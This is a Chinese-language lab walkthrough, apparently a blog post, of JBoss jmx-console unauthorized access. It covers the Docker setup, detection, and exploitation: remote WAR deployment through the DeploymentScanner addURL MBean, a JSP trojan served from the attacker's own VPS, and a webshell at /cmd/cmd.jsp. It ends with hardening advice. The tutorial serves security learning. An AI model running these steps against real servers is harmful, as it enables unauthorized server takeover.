环境搭建
docker搭建操作指南
docker search testjboss
docker pull testjboss/jboss
docker run -p 8085:8080 -d testjboss/jboss
![](https://img-blog.csdnimg.cn/img_convert/e30b4d39ce79df86d18a3d3534f4dbe0.png)
docker ps
#查看是否搭建成功
![](https://img-blog.csdnimg.cn/img_convert/9d659600e7e05cd3f15f70e4d0273088.png)
进行访问,出现以下界面即可搭建成功
![](https://img-blog.csdnimg.cn/img_convert/4875ec56a9f80613cdf8b8736ce1b38d.png)
漏洞简介
Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
![](https://img-blog.csdnimg.cn/img_convert/4022aed76b2c030826bbb80785ea3b24.png)
漏洞发现
访问
http://xx.xx.xx.xx/jmx-console/
如果可以直接访问或者通过默认账号密码登录则存在对应漏洞
![](https://img-blog.csdnimg.cn/img_convert/fc08c70f38e1fae742771f31bebed71f.png)
漏洞利用
远程部署war包
找到 jboss.deployment 选项 (jboss自带的部署功能)中的 flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)
![](https://img-blog.csdnimg.cn/img_convert/f88597ae6c24827dbe99f211056ffeb8.png)
也可以直接输入以下URL进入:
http://ip:port/jmx-console/HtmlAdaptor?
action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
进入页面后找到 void addURL()
![](https://img-blog.csdnimg.cn/img_convert/01611d7290749fbbba67899875416d8d.png)
在自己的vps上面部署远程的war木马,让目标机器请求我们的木马文件
jar -cvf shell.war jsp木马文件
python3 -m http.server
#python 开启http服务
![](https://img-blog.csdnimg.cn/img_convert/dbd6ebff506703ca8b78b5abc9c8e25d.png)
![](https://img-blog.csdnimg.cn/img_convert/86d9283fc5dbc04c36e8b4b7a1e72444.png)
在浏览器访问地址,获得war包路径。
![](https://img-blog.csdnimg.cn/img_convert/ab2be63d2ed591e0ca512b44ca80d067.png)
然后点击 Invoke 部署
![](https://img-blog.csdnimg.cn/img_convert/1591f34c23ce256504a8a302e70d1c00.png)
点击 Back to Agent View ,找到 jboss.web.deployment,查看是否上传成功
![](https://img-blog.csdnimg.cn/img_convert/019c370256c7eb68800f1c235278e6b2.png)
![](https://img-blog.csdnimg.cn/img_convert/90d6ea889b54e9383c14568194314751.png)
![](https://img-blog.csdnimg.cn/img_convert/c8da61f820914412c155c3ede3ecf938.png)
GET SHELL
访问地址:http://ip:port/cmd/cmd.jsp , 输入木马的访问密码即可拿到服务器权限
防护建议
对jmx-console和web-console界面访问增加强认证。
关闭jmx-console和web-console,提高安全性。